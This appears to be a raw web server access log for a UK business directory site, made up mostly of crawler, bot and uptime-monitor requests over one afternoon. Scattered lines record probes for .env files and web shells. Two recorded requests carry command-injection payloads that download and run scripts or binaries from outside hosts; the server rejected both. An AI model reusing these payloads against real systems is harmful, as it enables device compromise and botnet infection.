216.73.216.90 - - [27/Jul/2025:16:44:43 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
181.177.120.194 - - [27/Jul/2025:16:45:27 +0000] "GET /business/greater-manchester.html HTTP/1.0" 301 265 "http://yellowleaf.co.uk/business/greater-manchester.html" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64"
85.208.98.23 - - [27/Jul/2025:16:45:56 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
204.76.203.219 - - [27/Jul/2025:16:47:16 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.13.115.116 - - [27/Jul/2025:16:47:39 +0000] "GET /stevehowedrivingschool HTTP/1.1" 301 255 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
216.144.248.19 - - [27/Jul/2025:16:49:07 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
69.162.124.238 - - [27/Jul/2025:16:54:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.18 - - [27/Jul/2025:16:56:00 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html)"
98.159.226.168 - - [27/Jul/2025:16:57:36 +0000] "GET /support/ HTTP/1.0" 301 241 "http://yellowleaf.co.uk/support/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
43.135.140.225 - - [27/Jul/2025:16:58:53 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.144.248.23 - - [27/Jul/2025:16:59:18 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
45.194.66.7 - - [27/Jul/2025:17:01:12 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.62.213.165 - - [27/Jul/2025:17:03:21 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.144.248.22 - - [27/Jul/2025:17:04:22 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
167.94.138.173 - - [27/Jul/2025:17:05:34 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.173 - - [27/Jul/2025:17:05:59 +0000] "GET /favicon.ico HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.173 - - [27/Jul/2025:17:06:33 +0000] "PRI * HTTP/2.0" 403 - "-" "-"
167.94.138.173 - - [27/Jul/2025:17:06:54 +0000] "\x16\x03\x01" 403 - "-" "-"
167.94.138.173 - - [27/Jul/2025:17:06:58 +0000] "GET /login HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
216.144.248.27 - - [27/Jul/2025:17:09:29 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
192.0.114.20 - - [27/Jul/2025:17:13:29 +0000] "GET /members/uploads/1/5744_1.jpg HTTP/1.1" 301 265 "-" "Photon/1.0"
51.68.111.213 - - [27/Jul/2025:17:14:03 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.213 - - [27/Jul/2025:17:14:03 +0000] "GET /pages/11115-the-gap-partnership.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.213 - - [27/Jul/2025:17:14:04 +0000] "GET /pages/14790-bella-bathrooms.html HTTP/1.1" 301 269 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.213 - - [27/Jul/2025:17:14:05 +0000] "GET /pages/27516--soul-desire.html HTTP/1.1" 301 266 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.213 - - [27/Jul/2025:17:14:06 +0000] "GET /pages/27750-stickershop.html HTTP/1.1" 301 265 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.213 - - [27/Jul/2025:17:14:07 +0000] "GET /pages/29931-visage-clinic.html HTTP/1.1" 301 267 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
216.245.221.83 - - [27/Jul/2025:17:14:33 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [27/Jul/2025:17:15:20 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.138 - - [27/Jul/2025:17:15:21 +0000] "GET /pages/36025-leapfrog-internet-marketing.html HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.162.124.238 - - [27/Jul/2025:17:19:37 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [27/Jul/2025:17:21:30 +0000] "GET /pages/2917-andys-tyres-bridlington.html HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
216.144.248.30 - - [27/Jul/2025:17:24:40 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.73.216.90 - - [27/Jul/2025:17:28:39 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.90 - - [27/Jul/2025:17:28:40 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.144.248.18 - - [27/Jul/2025:17:29:43 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.22 - - [27/Jul/2025:17:34:47 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.244.66.197 - - [27/Jul/2025:17:36:25 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:17:36:25 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
69.63.189.15 - - [27/Jul/2025:17:37:43 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
216.144.248.25 - - [27/Jul/2025:17:39:51 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
20.191.45.212 - - [27/Jul/2025:17:40:46 +0000] "GET / HTTP/1.1" 301 237 "http://ns1.yellowleaf.co.uk/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
69.162.124.227 - - [27/Jul/2025:17:44:58 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [27/Jul/2025:17:45:15 +0000] "GET /pages/2917-andys-tyres-bridlington.html HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.144.248.25 - - [27/Jul/2025:17:50:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
69.162.124.238 - - [27/Jul/2025:17:55:07 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
13.79.225.242 - - [27/Jul/2025:17:59:18 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 281 "-" "-"
13.79.225.242 - - [27/Jul/2025:17:59:18 +0000] "GET /bu5.php HTTP/1.1" 301 240 "-" "-"
69.162.124.227 - - [27/Jul/2025:18:00:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
4.227.36.82 - - [27/Jul/2025:18:03:29 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.144.248.29 - - [27/Jul/2025:18:05:18 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
78.153.140.93 - - [27/Jul/2025:18:08:40 +0000] "GET /.env HTTP/1.1" 301 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.93 - - [27/Jul/2025:18:08:40 +0000] "POST / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
20.171.207.65 - - [27/Jul/2025:18:08:53 +0000] "GET /pages/30201-reedsy.html HTTP/1.1" 301 260 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
130.33.60.35 - - [27/Jul/2025:18:09:28 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 281 "-" "-"
216.245.221.83 - - [27/Jul/2025:18:10:22 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
202.8.43.235 - - [27/Jul/2025:18:10:48 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
202.8.43.235 - - [27/Jul/2025:18:10:49 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.144.248.18 - - [27/Jul/2025:18:16:58 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
185.192.70.154 - - [27/Jul/2025:18:18:35 +0000] "GET /support/ HTTP/1.0" 301 241 "http://yellowleaf.co.uk/support/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.197 - - [27/Jul/2025:18:21:11 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:18:21:12 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.144.248.27 - - [27/Jul/2025:18:22:04 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.24 - - [27/Jul/2025:18:27:08 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
20.171.8.156 - - [27/Jul/2025:18:30:27 +0000] "GET /actuator/health HTTP/1.1" 301 245 "-" "Mozilla/5.0 zgrab/0.x"
52.0.41.164 - - [27/Jul/2025:18:31:45 +0000] "GET /pages/39321-london-logos-design.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.144.248.30 - - [27/Jul/2025:18:32:12 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
146.190.134.221 - - [27/Jul/2025:18:35:09 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
146.190.134.221 - - [27/Jul/2025:18:35:20 +0000] "POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows HTTP/1.1" 301 325 "-" "SPARK COMMIT: 08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17"
216.144.248.29 - - [27/Jul/2025:18:37:18 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.30 - - [27/Jul/2025:18:42:23 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
1.92.219.75 - - [27/Jul/2025:18:44:49 +0000] "GET /members/uploads/3/2006_3.jpg HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
37.60.244.188 - - [27/Jul/2025:18:45:32 +0000] "GET /pages/41675-stl-communications-ltd.html HTTP/1.1" 301 276 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68"
69.162.124.238 - - [27/Jul/2025:18:47:28 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.76.94.12 - - [27/Jul/2025:18:51:44 +0000] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
69.162.124.227 - - [27/Jul/2025:18:52:34 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.28 - - [27/Jul/2025:18:57:40 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
159.223.35.109 - - [27/Jul/2025:18:59:20 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.70 Safari/537.36"
216.144.248.28 - - [27/Jul/2025:19:02:44 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
15.235.181.144 - - [27/Jul/2025:19:05:00 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.80 Safari/537.36"
216.244.66.197 - - [27/Jul/2025:19:05:42 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:19:05:42 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.73.216.90 - - [27/Jul/2025:19:07:00 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.90 - - [27/Jul/2025:19:07:01 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.144.248.22 - - [27/Jul/2025:19:07:49 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
35.231.99.26 - - [27/Jul/2025:19:12:20 +0000] "HEAD /wordpress HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:22 +0000] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:23 +0000] "HEAD /wp HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:23 +0000] "HEAD /bc HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:23 +0000] "HEAD /bk HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:24 +0000] "HEAD /backup HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:24 +0000] "HEAD /old HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:25 +0000] "HEAD /new HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:25 +0000] "HEAD /main HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.231.99.26 - - [27/Jul/2025:19:12:25 +0000] "HEAD /home HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
43.153.122.30 - - [27/Jul/2025:19:12:35 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.70.138 - - [27/Jul/2025:19:13:06 +0000] "GET /pages/5179-paragon-legal-services.html HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.162.124.238 - - [27/Jul/2025:19:13:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
220.132.173.47 - - [27/Jul/2025:19:14:41 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+/tmp;wget+http://unjiproxy.p-e.kr:6969/selftbk.sh+-O-|sh HTTP/1.1" 403 - "-" "curl/7.74.0"
216.144.248.24 - - [27/Jul/2025:19:18:19 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.27 - - [27/Jul/2025:19:23:24 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
54.198.102.12 - - [27/Jul/2025:19:24:49 +0000] "GET /robots.txt HTTP/1.1" 301 243 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
54.198.102.12 - - [27/Jul/2025:19:24:50 +0000] "HEAD /sitemap.xml HTTP/1.1" 301 - "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
216.144.248.25 - - [27/Jul/2025:19:28:28 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
43.134.40.233 - - [27/Jul/2025:19:30:56 +0000] "GET /ss.php?f_c=1 HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
216.144.248.23 - - [27/Jul/2025:19:33:34 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.23 - - [27/Jul/2025:19:38:38 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
13.221.186.2 - - [27/Jul/2025:19:40:01 +0000] "GET /robots.txt HTTP/1.1" 301 243 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
13.221.186.2 - - [27/Jul/2025:19:40:01 +0000] "HEAD /sitemap.xml HTTP/1.1" 301 - "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
216.245.221.83 - - [27/Jul/2025:19:43:43 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.28 - - [27/Jul/2025:19:48:47 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.244.66.197 - - [27/Jul/2025:19:50:11 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:19:50:11 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
204.76.203.219 - - [27/Jul/2025:19:50:58 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.68.107.138 - - [27/Jul/2025:19:51:33 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.107.138 - - [27/Jul/2025:19:51:33 +0000] "GET /pages/17053-photos-by-abhi.html HTTP/1.1" 301 268 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
185.191.171.3 - - [27/Jul/2025:19:53:38 +0000] "GET /business/county-antrim.html?page=5 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.144.248.25 - - [27/Jul/2025:19:53:53 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.73.216.90 - - [27/Jul/2025:19:54:20 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.144.248.21 - - [27/Jul/2025:19:58:59 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
199.188.125.166 - - [27/Jul/2025:20:00:10 +0000] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/89.221.203.116:6969/bins/arm7;chmod+777+arm7;./arm7+selfrep.jaws;wget+http:/\\/89.221.203.116:6969/bins/arm;chmod+777+arm;./arm+selfrep.jaws; HTTP/1.1" 403 - "-" "KrebsOnSecurity"
193.46.255.153 - - [27/Jul/2025:20:01:17 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
124.243.145.160 - - [27/Jul/2025:20:01:19 +0000] "GET /business/norfolk.html?page=15 HTTP/1.1" 301 266 "http://www.yellowleaf.co.uk/business/norfolk.html?page=15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
20.65.194.161 - - [27/Jul/2025:20:02:39 +0000] "GET /portal/redlion HTTP/1.1" 301 244 "-" "Mozilla/5.0 zgrab/0.x"
216.144.248.30 - - [27/Jul/2025:20:04:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
185.191.171.13 - - [27/Jul/2025:20:06:35 +0000] "GET /pages/49981-hitchin-door-and-window-repairs.html/ HTTP/1.1" 301 286 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [27/Jul/2025:20:06:56 +0000] "GET /pages/48481-canvey-island-door-and-window-repairs.html HTTP/1.1" 301 291 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:07:10 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
